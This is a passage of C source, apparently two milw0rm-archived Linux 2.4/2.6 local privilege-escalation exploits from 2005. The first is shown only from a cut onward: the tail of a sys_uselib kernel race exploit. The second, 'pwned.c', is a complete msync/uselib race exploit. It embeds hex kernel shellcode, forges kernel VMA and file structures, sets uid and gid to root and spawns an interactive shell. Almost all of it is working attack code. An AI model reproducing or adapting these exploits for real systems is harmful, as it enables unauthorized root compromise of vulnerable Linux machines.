fp = fopen("/proc/slabinfo", "r"); if(!fp) fatal("get_slab_objs: fopen", 0); fgets(name, sizeof(name) - 1, fp); do { c = u = a = -1; if (!fgets(line, sizeof(line) - 1, fp)) break; c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d, &d); } while (strcmp(name, sn)); close(fileno(fp)); fclose(fp); return c == 7 ? a - u : -1; } // leave one object in the SLAB inline void prepare_slab() { int *r; map_addr -= PAGE_SIZE; map_count++; map_flags ^= PROT_READ; r = (void*)sys_mmap2((unsigned)map_addr, PAGE_SIZE, map_flags, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(MAP_FAILED == r) { fatal("try again", 0); } *r = map_addr; } // sig handlers void segvcnt(int v) { scnt++; scan_mm_finish(); } // child reap void reaper(int v) { ccnt++; waitpid(0, &v, WNOHANG|WUNTRACED); } // sometimes I get the VMAs in reversed order... // so just use anyone of the two but take care about the flags void check_vma_flags(); void vreversed(int v) { map_flags = 0; check_vma_flags(); } void check_vma_flags() { if(map_flags) { __asm__("movl %%esp, %0" : :"m"(old_esp) ); } else { __asm__("movl %0, %%esp" : :"m"(old_esp) ); goto out; } signal(SIGSEGV, vreversed); val = * (unsigned*)(lib_addr + PAGE_SIZE); out: } // use elf library and try to sleep on kmalloc void exploitme() { int r, sz, pcnt=0; static char smiley[]="-\\|/-\\|/"; // printf("\n cat /proc/%d/maps", getpid() ); fflush(stdout); // helper clone finish=0; ccnt=0; sz = sizeof(cstack) / sizeof(cstack[0]); cpid = clone(&raceme, (void*) &cstack[sz-16], CLONE_VM|CLONE_SIGHAND|CLONE_FS|SIGCHLD, NULL ); if(-1==cpid) fatal("clone", 0); // synchronize threads while(!finish) sys_sched_yield(); finish=0; if(!silent) { printf("\n"); fflush(stdout); } // try to hit the kmalloc race for(;;) { r = get_slab_objs("vm_area_struct"); while(r != 1) { prepare_slab(); r--; } sys_gettimeofday(&tm1, NULL); go = 1; r=sys_uselib(libname); go = 0; if(r) fatal("uselib", 0); if(finish) break; // wipe lib VMAs and try again r = sys_munmap(lib_addr, LIB_SIZE); if(r) fatal("munmap lib", 0); if(ccnt) goto failed; if( !silent && !(pcnt%64) ) { printf("\r Wait... %c", smiley[ (pcnt/64)%8 ]); fflush(stdout); } pcnt++; } // seems we raced, free mem r = sys_munmap(map_addr, map_base-map_addr + PAGE_SIZE); if(r) fatal("munmap 1", 0); r = sys_munmap(lib_addr, PAGE_SIZE); if(r) fatal("munmap 2", 0); // relax kswapd sys_gettimeofday(&tm1, NULL); for(;;) { sys_sched_yield(); sys_gettimeofday(&tm2, NULL); delta = tmdiff(&tm1, &tm2); if( wtime*1000000U <= (unsigned)delta ) break; } // we need to check the PROT_EXEC flag map_flags = PROT_EXEC; check_vma_flags(); if(!map_flags) { printf("\n VMAs reversed"); fflush(stdout); } // write protect brk's VMA to fool vm_enough_memory() r = sys_mprotect((lib_addr + PAGE_SIZE), LIB_SIZE-PAGE_SIZE, PROT_READ|map_flags); if(-1==r) { fatal("mprotect brk", 0); } // this will finally make the big VMA... sz = (0-lib_addr) - LIB_SIZE - PAGE_SIZE; expand: r = sys_madvise((void*)(lib_addr + PAGE_SIZE), LIB_SIZE-PAGE_SIZE, MADV_NORMAL); if(r) fatal("madvise", 0); r = sys_mremap(lib_addr + LIB_SIZE-PAGE_SIZE, PAGE_SIZE, sz, MREMAP_MAYMOVE, 0); if(-1==r) { if(0==sz) { fatal("mremap: expand VMA", 0); } else { sz -= PAGE_SIZE; goto expand; } } vma_start = lib_addr + PAGE_SIZE; vma_end = vma_start + sz + 2*PAGE_SIZE; printf("\n expanded VMA (0x%.8x-0x%.8x)", vma_start, vma_end); fflush(stdout); // try to figure kernel layout signal(SIGCHLD, reaper); signal(SIGSEGV, segvcnt); signal(SIGBUS, segvcnt); scan_mm_start(); failed: fatal("try again", 0); } // make fake ELF library void make_lib() { struct elfhdr eh; struct elf_phdr eph; static char tmpbuf[PAGE_SIZE]; int fd; // make our elf library umask(022); unlink(libname); fd=open(libname, O_RDWR|O_CREAT|O_TRUNC, 0755); if(fd<0) fatal("open lib ("LIBNAME" not writable?)", 0); memset(&eh, 0, sizeof(eh) ); // elf exec header memcpy(eh.e_ident, ELFMAG, SELFMAG); eh.e_type = ET_EXEC; eh.e_machine = EM_386; eh.e_phentsize = sizeof(struct elf_phdr); eh.e_phnum = 1; eh.e_phoff = sizeof(eh); write(fd, &eh, sizeof(eh) ); // section header: memset(&eph, 0, sizeof(eph) ); eph.p_type = PT_LOAD; eph.p_offset = 4096; eph.p_filesz = 4096; eph.p_vaddr = lib_addr; eph.p_memsz = LIB_SIZE; eph.p_flags = PF_W|PF_R|PF_X; write(fd, &eph, sizeof(eph) ); // execable code lseek(fd, 4096, SEEK_SET); memset(tmpbuf, 0x90, sizeof(tmpbuf) ); write(fd, &tmpbuf, sizeof(tmpbuf) ); close(fd); } // move stack down #2 void prepare_finish() { int r; static struct sysinfo si; old_esp &= ~(PAGE_SIZE-1); old_esp -= PAGE_SIZE; task_size = ((unsigned)old_esp + 1 GB ) / (1 GB) * 1 GB; r = sys_munmap(old_esp, task_size-old_esp); if(r) fatal("unmap stack", 0); // setup rt env uid = getuid(); lib_addr = task_size - LIB_SIZE - PAGE_SIZE; if(map_base) map_addr = map_base; else map_base = map_addr = (lib_addr - PGD_SIZE) & ~(PGD_SIZE-1); printf("\n[+] moved stack %x, task_size=0x%.8x, map_base=0x%.8x", old_esp, task_size, map_base); fflush(stdout); // check physical mem & prepare sysinfo(&si); addr_min = task_size + si.totalram; addr_min = (addr_min + PGD_SIZE - 1) & ~(PGD_SIZE-1); addr_max = addr_min + si.totalram; if((unsigned)addr_max >= 0xffffe000 || (unsigned)addr_max < (unsigned)addr_min) addr_max = 0xffffd000; printf("\n[+] vmalloc area 0x%.8x - 0x%.8x", addr_min, addr_max); max_page = (addr_max - addr_min) / PAGE_SIZE; pagemap = malloc( max_page + 32 ); if(!pagemap) fatal("malloc pagemap", 1); memset(pagemap, 0, max_page + 32); // go go make_lib(); exploitme(); } // move stack down #1 void prepare() { unsigned p=0; environ = myenv; p = sys_mmap2( 0, STACK_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0 ); if(-1==p) fatal("mmap2 stack", 0); p += STACK_SIZE - 64; __asm__("movl %%esp, %0 \n" "movl %1, %%esp \n" : : "m"(old_esp), "m"(p) ); prepare_finish(); } void chldcnt(int v) { ccnt++; } // alloc slab objects... inline void do_wipe() { int *r, c=0, left=0; __asm__("movl %%esp, %0" : : "m"(old_esp) ); old_esp = (old_esp - PGD_SIZE+1) & ~(PGD_SIZE-1); old_esp = map_base? map_base : old_esp; for(;;) { if(left<=0) left = get_slab_objs("vm_area_struct"); if(left <= SLAB_THRSH) break; left--; map_flags ^= PROT_READ; old_esp -= PAGE_SIZE; r = (void*)sys_mmap2(old_esp, PAGE_SIZE, map_flags, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0 ); if(MAP_FAILED == r) break; if(c>SLAB_PER_CHLD) break; if( (c%1024)==0 ) { if(!c) printf("\n"); printf("\r child %d VMAs %d", val, c); fflush(stdout); } c++; } printf("\r child %d VMAs %d", val, c); fflush(stdout); kill(getppid(), SIGUSR1); for(;;) pause(); } // empty SLAB caches void wipe_slab() { signal(SIGUSR1, chldcnt); printf("\n[+] SLAB cleanup"); fflush(stdout); for(;;) { ccnt=0; val++; cpid = fork(); if(!cpid) do_wipe(); while(!ccnt) sys_sched_yield(); if( get_slab_objs("vm_area_struct") <= SLAB_THRSH ) break; } signal(SIGUSR1, SIG_DFL); } void usage(char *n) { printf("\nUsage: %s\t-f forced stop\n", n); printf("\t\t-s silent mode\n"); printf("\t\t-c command to run\n"); printf("\t\t-n SMP iterations\n"); printf("\t\t-d race delta us\n"); printf("\t\t-w wait time seconds\n"); printf("\t\t-l alternate lib name\n"); printf("\t\t-a alternate addr hex\n"); printf("\n"); _exit(1); } // give -s for forced stop, -b to clean SLAB int main(int ac, char **av) { int r; while(ac) { r = getopt(ac, av, "n:l:a:w:c:d:fsh"); if(r<0) break; switch(r) { case 'f' : fstop = 1; break; case 's' : silent = 1; break; case 'n' : smp_max = atoi(optarg); break; case 'd': if(1!=sscanf(optarg, "%u", &delta_max) || delta_max > 100000u ) fatal("bad delta value", 0); break; case 'w' : wtime = atoi(optarg); if(wtime<0) fatal("bad wait value", 0); break; case 'l' : libname = strdup(optarg); break; case 'c' : shellname = strdup(optarg); break; case 'a' : if(1!=sscanf(optarg, "%x", &map_base)) fatal("bad addr value", 0); map_base &= ~(PGD_SIZE-1); break; case 'h' : default: usage(av[0]); break; } } // basic setup uid = getuid(); setpgrp(); wipe_slab(); prepare(); return 0; } // milw0rm.com [2005-01-07]

/* * pwned.c - linux 2.4 and 2.6 sys_uselib local root exploit. PRIVATE. * it's not the best one, the ldt approach is definitively better. * discovered may 2004. no longer private because lorian/cliph/ihaquer * can lick my balls. * (c) 2004 sd <sd@fucksheep.org> * requieres cca 1gb on fs. */ /* * first create fake vma structs. * * * let's have 3 threads, t1, t2 and t3. * t1 and t2 have common vm. * * t3: * - wait4sig (will come back from t2) * - write(fd3, bigmem, bigfile_size) * - exit() * t1: * - fd3 = empty file * - fd1 = bigfile, writing it took 16 secs * - bigmem = mmap(NULL, bigfile_size, fd1, 0); * - t3 = fork() * - t2 = clone() * - fd2 = munmap_file, size of ram. * - mumem = mmap(NULL, munmap_file_size, fd2) * - mmap(mumem, 4096, ANONYMOUS) // for extending do_brk check * - mmap lots of vmas * - close(fd2); * - create evil lib * - free lot of vmas * - sig @ t2 * - evil_lib->do_munmap(mumem + 4096, munmap_file_size - 4096); * - sem = 1 * - waitpid * t2: * - wait4sig * - sleep(100msec) * - mmap(mumem, fd3, 4096) // this is being protected by i_sem ! * - sendsig @ t3 * - sleep(100msec) * - if (sem) error * - msync(mumem, 8192) - will wait for write() to finish. munmap finishes by that * time * - if (!sem) error * - if it does return we failed, otherwise shell. * */ #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <time.h> #include <sched.h> #include <signal.h> #include <stdio.h> #include <sys/types.h> #include <sys/stat.h> #include <linux/fcntl.h> #include <sys/mman.h> #include <sys/time.h> #include <linux/elf.h> #define __WCLONE 0x80000000 /* Wait only on non-SIGCHLD children */ #define ltime unsigned long long #define MEMSZ (70*1024*1024) #define MAGIC -123 unsigned char shellcode[] = "\x60\xe8\x5f\x00\x00\x00\x30\x03\x98\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x52\x49\x56\x41\x54\x45\x2a\x6b\x65\x72\x6e\x65\x6c\x20\x63\x61\x70\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x2c\x20\x28\x63\x29\x20\x32\x30\x30\x34\x20\x3c\x73\x64\x40\x68\x79\x73\x74\x65\x72\x69\x61\x2e\x73\x6b\x3e\x2a\x50\x52\x49\x56\x41\x54\x45\x5b\xbd\x00\xe0\xff\xff\x21\xe5\x81\x7d\x00\x00\x00\x00\xc0\x72\x03\x8b\x6d\x00\x8d\x4b\x08\xb8\xb8\x00\x00\x00\xcd\x80\x8b\x11\x8b\x71\x04\x8b\x79\x08\x83\xc5\x04\x39\x55\x00\x75\xf8\x39\x7d\x04\x75\xf3\x39\x75\x08\x75\xee\x31\xc0\x48\x89\x45\x00\x89\x45\x04\x89\x45\x08\xb8\xb8\x00\x00\x00\x8d\x4b\x14\xcd\x80\xff\x41\x04\x74\x0b\x89\x55\x00\x89\x7d\x04\x89\x75\x08\xeb\xc8\x61\xb8\x85\xff\xff\xff\xc3"; static ltime gtime() { struct timeval tv; gettimeofday(&tv, NULL); return tv.tv_sec * 1000000 + tv.tv_usec; } ltime lt; static void time_start() { lt = gtime(); } static void time_end() { printf("took %lu microseconds\n", gtime() - lt); } void core_stat() { int s; char buf[512]; char incore; unsigned long last = 0; FILE *f; sprintf(buf, "/proc/%d/maps", getpid()); f = fopen(buf, "rt"); while (fgets(buf, 512, f)) { unsigned int from, to; unsigned int i; if (sscanf(buf, "%x-%x", &from, &to) < 2) break; // printf("%p!%p\n", from, to); for (i = from; i < to; i += PAGE_SIZE) { mincore((void *) i, PAGE_SIZE, &incore); if (incore) { r:; if (!last) { printf("in core 0x%08x-", i); s = last = i; continue; } if (last + PAGE_SIZE == i) { // printf("(%p)", i); last = i; continue; } printf("0x%08x (%d)\n", last + PAGE_SIZE, last + PAGE_SIZE - s); last = 0; goto r; } if (!last) continue; printf("0x%08x (%d)\n", last + PAGE_SIZE, last + PAGE_SIZE - s); last = 0; } } fclose(f); } #define SWAPFILE "TTswap" #define EATFILES "TTeatfiles" #define EATFILE "TTeatfile" #define SHAREFILE "TTsharefile" #define DUMMYFILE "TTdummyfile" #define EATTIME 10 #define LIBFILE "TTlib" /* number of vma struct fill */ #define VMAFILL 15000 /* how much pages to sync - 2 is enough */ #define NSYNC 2 #define BASE (char *) 0x60000000 #define DBASE (char *) 0x80001000 #define EPAGE (char *) 0x80000000 #define MAPSTEP 64 * 4096 #if 1 #define DEBUG(x...) { printf("%s():", __func__); printf(x); printf("\n"); } #else #define DEBUG(x...) #endif #define sendsig(pid) kill(pid, SIGUSR1) #define wait4sig() { while (!gotsig) pause(); gotsig = 0; } #define PAGE_DOWN(x) (x & ~(PAGE_SIZE-1)) #define PAGE_ALIGN(x) ((x+PAGE_SIZE-1) & ~(PAGE_SIZE-1)) #undef O_DIRECT #define O_DIRECT 0 struct libimg { Elf32_Ehdr elf; Elf32_Phdr ph; }; struct dentry_struct { unsigned dummy0, dummy1; void *inode1, *inode2; }; struct file_struct { struct file_struct *next, *prev; void *dentry; void *mnt; void *op; void *f_mapping[64]; /* somewhere in there is f_mapping on 2.6 */ }; /* this should roughly cover 2.4* and 2.6* */ struct vma_struct { void *mm; unsigned long vm_start; unsigned long vm_end; struct vma_struct *vm_next; unsigned long pgprot; unsigned long vmflags; char rb[16]; void *shared_next, *shared_prev; void *vm_ops; unsigned long pgoff; void *file; void *priv; }; struct mm_struct { struct vma_struct *mmap; void *rb; struct vma_struct *cache; void *pgd1; void *pgd2; void *pgd3; /* somewhere there lies the spinlock */ unsigned long locks[32]; }; /* the image of the evil library. */ struct libimg limg = { { e_ident: "\177ELF", e_type: ET_EXEC, e_machine: EM_386, e_phoff: sizeof(Elf32_Ehdr), e_ehsize: sizeof(Elf32_Ehdr), e_phentsize: sizeof(Elf32_Phdr), e_phnum: 1 }, { p_type: PT_LOAD, p_vaddr: 0, p_memsz: 0 } }; static void make_lib(char *name) { int libfd = open(name, O_CREAT|O_RDWR|O_TRUNC, 0700); write(libfd, &limg, sizeof(limg)); fchmod(libfd, 0700); } static char thread_stack[16384]; int fd1, fd2, fd3; char buf[MAPSTEP]; int notincore; int t4; int t3; int t2; int bigsize = 0; char *bigmem = NULL; int swapsize = 0; char *swapmem = NULL; char *base = BASE; char *vmamem; int gotsig = 0; int sem = 0; #define cleanup() _cleanup(__func__, __LINE__) void killall() { if (t2 != getpid()) kill(t2, SIGKILL); if (t3 != getpid()) kill(t3, SIGKILL); if (t4 != getpid()) kill(t4, SIGKILL); } void _cleanup(const char *name, int line) { printf("cleanup called! from %s:%d\n", name, line); killall(); unlink(SHAREFILE); unlink(SWAPFILE); unlink(EATFILES); unlink(EATFILE); unlink(LIBFILE); _exit(1); } #define FAKES_BASE 0x50000000 struct fakes { int t1; struct mm_struct mm; struct vma_struct vma; struct file_struct file; struct dentry_struct dentry; unsigned long mapping24[128]; unsigned long mapping26[128]; unsigned long inode[128]; unsigned long pgd[1024]; void *ptrs[128]; char shellcode[sizeof(shellcode)]; int t2; }; struct fakes *fakes = (void *) FAKES_BASE; /* build the fake vma which msync_interval will get * we've to emulate a lot of things! */ void build_fakevma() { int i; memset(fakes, 0, sizeof(*fakes)); fakes->vma.vm_end = (unsigned)( base + PAGE_SIZE * 2); fakes->vma.vm_start = (unsigned)(base + PAGE_SIZE); /* we need this to let the kernel enter the fs callback we control */ fakes->vma.vmflags = 0xf; fakes->vma.file = &fakes->file; fakes->vma.mm = &fakes->mm; fakes->mm.pgd1 = fakes->pgd; fakes->mm.pgd2 = fakes->pgd; fakes->mm.pgd3 = fakes->pgd; /* there are no pmd's */ memset(fakes->pgd, 0, sizeof(fakes->pgd)); /* initialize potential spinlock on smp */ for (i = 0; i < 32; i++) fakes->mm.locks[i] = 1; /* 2.4 goes thru dentry */ fakes->file.dentry = &fakes->dentry; fakes->dentry.inode1 = fakes->inode; fakes->dentry.inode2 = fakes->inode; /* this will be i_sem */ for (i = 0; i < 32; i++) fakes->inode[i] = 1; /* and this reference to i_mapping */ for (i = 32; i < 128; i++) fakes->inode[i] = (unsigned long) fakes->mapping24; /* 2.6 goes thru f_mapping */ for (i = 0; i < 64; i++) fakes->file.f_mapping[i] = fakes->mapping26; /* prepare mmappings for both 2.4 and 2.6 */ /* mapping on 2.6 requieres to have ->host defined. and backing_dev_info pointing to bunch of nonzero memory. also locked_pages list must point to itself (empty) */ fakes->mapping26[0] = (unsigned long) fakes->inode; for (i = 1; i <= 3; i++) fakes->mapping26[i] = 0; for (i = 4; i < 16; i++) fakes->mapping26[i] = (unsigned long) &fakes->mapping26[i]; for (i = 16; i <= 30; i++) fakes->mapping26[i] = (unsigned long) fakes->ptrs; /* mapping on 2.4 requieres only having mapping consisting of empty lists */ for (i = 0; i <= 30; i++) fakes->mapping24[i] = (unsigned long) &fakes->mapping24[i]; for (i = 23; i <= 30; i++) fakes->mapping24[i] = (unsigned long) fakes->ptrs; /* ok, now setup fops->f_sync to our evil fsync */ fakes->file.op = fakes->ptrs; for (i = 0; i < 128; i++) fakes->ptrs[i] = fakes->shellcode; memcpy(fakes->shellcode, shellcode, sizeof(shellcode)); } void create_fakepage(void *buf) { int i; void *vma = &fakes->vma; void **p = buf; for (i = 0; i < MAPSTEP; i += sizeof(void *)) *p++ = vma; /* !!! */ } static void sighand(int d) { gotsig = 1; } static int thread(void *d) { int t3; int ret; int i; wait4sig(); printf("(sleep1)\n"); usleep(300000); printf("(sleep1 finished)\n"); printf("trying to mmap back the evil page\n"); for (i = 0; i < VMAFILL; i++) { if (i == VMAFILL/2) ret=mmap(swapmem + PAGE_SIZE * 2, PAGE_SIZE, PROT_READ|PROT_WRITE,MAP_SHARED|MAP_FIXED, fd3, 0); mmap(vmamem + i * PAGE_SIZE, PAGE_SIZE, PROT_READ|((i&1)?(PROT_WRITE):(PROT_EXEC)), MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); } swapmem[PAGE_SIZE*2] = 'x'; printf("%p, evil mapped\n",ret); printf("(sleep2)\n"); if (sem) cleanup(); sendsig(t3); usleep(300000); printf("(sleep2 finished)\n"); if (sem) cleanup(); munmap(vmamem, VMAFILL * PAGE_SIZE); printf("doing msync\n"); printf("still doing msync\n"); ret = msync(swapmem + PAGE_SIZE * 2, PAGE_SIZE * 4, MS_SYNC); printf("finished msync, %d, errno=%d\n", ret, errno); if (ret == -1 && errno == 123) { sem = 0; killall(); printf("y4'r3 1uCky k1d!\n"); setresuid(0, 0, 0); setresgid(0, 0, 0); execl("/bin/sh", "sh", "-i", NULL); printf("execve failed %d\n", errno); } if (!sem) { printf(":(\n"); cleanup(); } _exit(0); } int main(int argc, char *argv[]) { int i, n; char *dummy = DBASE; printf("linux kernel msync race condition\nbug discovered by sd, further research by sd and *****\nthis is development-in-progress code, redistribution prohibited!\n=============================================\n"); signal(SIGUSR1, sighand); signal(SIGALRM, sighand); setbuf(stdout, NULL); i = open(SHAREFILE, O_CREAT|O_RDWR|O_TRUNC, 0777); mmap(FAKES_BASE, PAGE_ALIGN(sizeof(*fakes)), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED, i,0); ftruncate(i, PAGE_ALIGN(sizeof(*fakes))); build_fakevma(); t4 = fork(); if (!t4) { while (1) { fakes->t1++; fakes->t2++; sched_yield(); } } printf("creating fakepage\n"); create_fakepage(buf); i = open(DUMMYFILE,O_CREAT|O_RDWR|O_TRUNC, 0777); ftruncate(i, MAPSTEP); write(i, buf, MAPSTEP); for (n = 0; n < MEMSZ; n += MAPSTEP) mmap(dummy + n, MAPSTEP, PROT_READ|PROT_WRITE, MAP_SHARED, i, 0); fd3 = open(EATFILE, O_CREAT|O_RDWR|O_TRUNC, 0777); ftruncate(fd3, 16384); /* create the source junkfile */ fd1 = open(EATFILES, O_CREAT|O_RDWR|O_TRUNC, 0777); alarm(EATTIME); printf("done fakepage\n"); do { int c; c = write(fd1, buf, MAPSTEP); if (c < MAPSTEP) break; bigsize += c; printf("done %d Kb\r", bigsize / 1024); } while (!gotsig); printf("\n"); alarm(0); gotsig = 0; bigmem = mmap(base - bigsize, bigsize, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_FIXED|MAP_SHARED, fd1, 0); if (bigmem == MAP_FAILED) cleanup(); t3 = fork(); if (!t3) { wait4sig(); printf("starting aggresive write!\n"); write(fd3, bigmem, bigsize); printf("done aggresive write!\n"); _exit(0); } t2 = clone(thread, thread_stack + sizeof(thread_stack) - 4, 0xf00, NULL); swapmem = base; if (mmap(swapmem, PAGE_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0) == MAP_FAILED) cleanup(); /* create the swap */ printf("creating swapfile\n"); fd2 = open(SWAPFILE, O_CREAT|O_RDWR|O_TRUNC, 0777); ftruncate(fd2, MEMSZ); vmamem = swapmem + MEMSZ + 16*PAGE_SIZE; // base += VMAFILL * PAGE_SIZE; printf("vmamem = %p\n", vmamem); mmap(swapmem + PAGE_SIZE, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, fd2, 0); printf("swapmem = %p, swapsize = %d\n", swapmem, 2*PAGE_SIZE); // getchar(); // munmap(vmamem, VMAFILL * PAGE_SIZE); write(fd2, dummy, MEMSZ); close(fd2); printf("unlink\n"); unlink(SWAPFILE); // core_stat(); build_fakevma(); sendsig(t2); limg.ph.p_vaddr = (unsigned) swapmem + PAGE_SIZE; limg.ph.p_memsz = PAGE_SIZE * 2; make_lib(LIBFILE); printf("started uselib\n"); time_start(); uselib(LIBFILE); // munmap(swapmem + PAGE_SIZE, PAGE_SIZE); time_end(); printf("uselib finished!\n"); sem = 1; printf("pid %d\n",getpid()); // core_stat(); n = 0; n = waitpid(t2, NULL, __WCLONE); printf("waitpid got %d/%d\n", n, errno); // killall(); cleanup(); } // milw0rm.com [2005-03-22]